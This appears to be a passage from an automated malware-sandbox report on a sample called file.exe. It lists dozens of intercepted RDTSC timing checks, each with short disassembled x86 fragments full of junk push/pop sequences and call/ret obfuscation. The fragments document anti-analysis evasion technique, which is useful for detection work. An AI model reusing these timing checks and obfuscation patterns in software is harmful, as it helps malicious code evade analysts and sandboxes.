                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4BA1 second address: DA4BAB instructions: 0x00000000 rdtsc 0x00000002 je 00007F0F7085C596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA4BAB second address: DA4BB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA77E0 second address: DA77EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F0F7085C596h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA8169 second address: DA816D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA816D second address: DA8173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA8173 second address: DA817A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA817A second address: DA8200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F0F7085C5A2h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F0F7085C598h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b and esi, 72B07213h 0x00000031 push 00000000h 0x00000033 mov esi, 0FFA026Ch 0x00000038 xchg eax, ebx 0x00000039 pushad 0x0000003a jmp 00007F0F7085C5A5h 0x0000003f jmp 00007F0F7085C5A5h 0x00000044 popad 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 jng 00007F0F7085C59Ch 0x0000004e jnl 00007F0F7085C596h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA8200 second address: DA820A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F0F70ECA9A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA8BF2 second address: DA8BF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA8BF8 second address: DA8C02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F0F70ECA9A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DABD2B second address: DABD2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DACCB2 second address: DACCF6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0F70ECA9A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F0F70ECA9A8h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 push 00000000h 0x00000028 mov dword ptr [ebp+1246FD71h], ecx 0x0000002e mov ebx, dword ptr [ebp+122D18D0h] 0x00000034 push 00000000h 0x00000036 cld 0x00000037 xchg eax, esi 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push edx 0x0000003d pop edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DACCF6 second address: DACD0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C5A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DACD0C second address: DACD12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DACD12 second address: DACD3B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0F7085C596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0F7085C5A8h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DACD3B second address: DACD3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DACD3F second address: DACD45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DACD45 second address: DACD4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAED8E second address: DAED92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAFE55 second address: DAFE59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAFE59 second address: DAFE5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAFE5F second address: DAFE69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0F70ECA9A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB0DC9 second address: DB0DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB0DCD second address: DB0DD3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA896A second address: DA896F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA896F second address: DA8982 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jng 00007F0F70ECA9A6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB1E41 second address: DB1E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB1E45 second address: DB1E61 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0F70ECA9A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0F70ECA9ADh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB1E61 second address: DB1E73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C59Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA9517 second address: DA951C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB3E30 second address: DB3E36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB3E36 second address: DB3E45 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB3E45 second address: DB3E4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB3E4B second address: DB3EF8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F0F70ECA9AAh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c call 00007F0F70ECA9B2h 0x00000011 mov edi, 1B615EF4h 0x00000016 pop edi 0x00000017 push 00000000h 0x00000019 jmp 00007F0F70ECA9ACh 0x0000001e add ebx, 43AE4EB8h 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push eax 0x00000029 call 00007F0F70ECA9A8h 0x0000002e pop eax 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc eax 0x0000003c push eax 0x0000003d ret 0x0000003e pop eax 0x0000003f ret 0x00000040 add dword ptr [ebp+12466F48h], edx 0x00000046 jns 00007F0F70ECA9BDh 0x0000004c mov edi, eax 0x0000004e xchg eax, esi 0x0000004f pushad 0x00000050 jmp 00007F0F70ECA9B4h 0x00000055 push esi 0x00000056 jl 00007F0F70ECA9A6h 0x0000005c pop esi 0x0000005d popad 0x0000005e push eax 0x0000005f pushad 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB4DC0 second address: DB4DC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB4DC6 second address: DB4E1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F0F70ECA9A8h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov edi, dword ptr [ebp+1246BCC9h] 0x00000029 jmp 00007F0F70ECA9B5h 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+122DB99Eh], eax 0x00000036 push 00000000h 0x00000038 xchg eax, esi 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push ecx 0x0000003d pop ecx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB4E1C second address: DB4E20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB5DCD second address: DB5DDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F70ECA9AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB5DDF second address: DB5DE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB5DE6 second address: DB5DF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F0F70ECA9A6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DACE7E second address: DACF22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 push dword ptr fs:[00000000h] 0x00000010 mov edi, dword ptr [ebp+122D295Fh] 0x00000016 mov dword ptr fs:[00000000h], esp 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007F0F7085C598h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 0000001Bh 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 jg 00007F0F7085C59Ch 0x0000003d jnc 00007F0F7085C5A2h 0x00000043 mov eax, dword ptr [ebp+122D15A1h] 0x00000049 mov dword ptr [ebp+12465A99h], esi 0x0000004f push FFFFFFFFh 0x00000051 push 00000000h 0x00000053 push edi 0x00000054 call 00007F0F7085C598h 0x00000059 pop edi 0x0000005a mov dword ptr [esp+04h], edi 0x0000005e add dword ptr [esp+04h], 00000017h 0x00000066 inc edi 0x00000067 push edi 0x00000068 ret 0x00000069 pop edi 0x0000006a ret 0x0000006b pushad 0x0000006c sub edi, dword ptr [ebp+122D2E56h] 0x00000072 mov ebx, dword ptr [ebp+122D1B1Ah] 0x00000078 popad 0x00000079 push eax 0x0000007a push eax 0x0000007b push edx 0x0000007c push edx 0x0000007d jng 00007F0F7085C596h 0x00000083 pop edx 0x00000084 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DACF22 second address: DACF28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAF02B second address: DAF050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b ja 00007F0F7085C5B0h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0F7085C5A2h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB7E27 second address: DB7EA7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0F70ECA9A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F0F70ECA9B3h 0x00000010 jmp 00007F0F70ECA9ADh 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007F0F70ECA9B0h 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007F0F70ECA9A8h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 0000001Dh 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ebp 0x0000003e call 00007F0F70ECA9A8h 0x00000043 pop ebp 0x00000044 mov dword ptr [esp+04h], ebp 0x00000048 add dword ptr [esp+04h], 00000014h 0x00000050 inc ebp 0x00000051 push ebp 0x00000052 ret 0x00000053 pop ebp 0x00000054 ret 0x00000055 xchg eax, esi 0x00000056 push eax 0x00000057 push edx 0x00000058 push esi 0x00000059 ja 00007F0F70ECA9A6h 0x0000005f pop esi 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DADF9E second address: DADFB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F7085C5A0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DADFB3 second address: DADFD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b jmp 00007F0F70ECA9B6h 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB9D51 second address: DB9D55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBACCC second address: DBAD13 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0F70ECA9ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d jl 00007F0F70ECA9A6h 0x00000013 pop esi 0x00000014 pop edx 0x00000015 nop 0x00000016 movsx edi, si 0x00000019 push 00000000h 0x0000001b mov bx, dx 0x0000001e push 00000000h 0x00000020 movsx ebx, ax 0x00000023 mov ebx, eax 0x00000025 xchg eax, esi 0x00000026 push edi 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F0F70ECA9B8h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB4157 second address: DB415C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB701E second address: DB7022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB7FB2 second address: DB7FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB7FB6 second address: DB7FBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DB9ED4 second address: DB9ED9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBAEEA second address: DBAEF8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0F70ECA9A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBAEF8 second address: DBAEFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBAF8D second address: DBAF91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBAF91 second address: DBAF9B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBAF9B second address: DBAF9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBE9B1 second address: DBE9B7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC2ABC second address: DC2AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F0F70ECA9A8h 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F0F70ECA9A6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC2AD3 second address: DC2ADF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F0F7085C596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC2446 second address: DC245A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0F70ECA9AAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC2585 second address: DC259B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C5A0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC259B second address: DC25A5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0F70ECA9AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC25A5 second address: DC25AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC769C second address: DC76A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC76A0 second address: DC76A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC76A4 second address: DC76B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC76B2 second address: DC76B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC76B9 second address: DC76BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCC9BF second address: DCC9C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCC9C3 second address: DCC9C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCCCD1 second address: DCCD06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C5A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F0F7085C59Eh 0x00000011 pushad 0x00000012 popad 0x00000013 ja 00007F0F7085C596h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCCF83 second address: DCCF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jo 00007F0F70ECA9ACh 0x0000000c jc 00007F0F70ECA9A6h 0x00000012 ja 00007F0F70ECA9ACh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DCD0CE second address: DCD0DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F0F7085C596h 0x0000000a js 00007F0F7085C596h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D63F13 second address: D63F2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F70ECA9B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D63F2A second address: D63F34 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0F7085C59Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D63F34 second address: D63F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0F70ECA9B3h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD299C second address: DD29A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD29A0 second address: DD29A8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD29A8 second address: DD29AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD29AE second address: DD29BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F0F70ECA9A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD2C61 second address: DD2C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jnp 00007F0F7085C596h 0x0000000e popad 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD2C78 second address: DD2C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD2C7F second address: DD2C84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD2F37 second address: DD2F41 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0F70ECA9A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A77D second address: D8A783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6C6E2 second address: D6C6E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
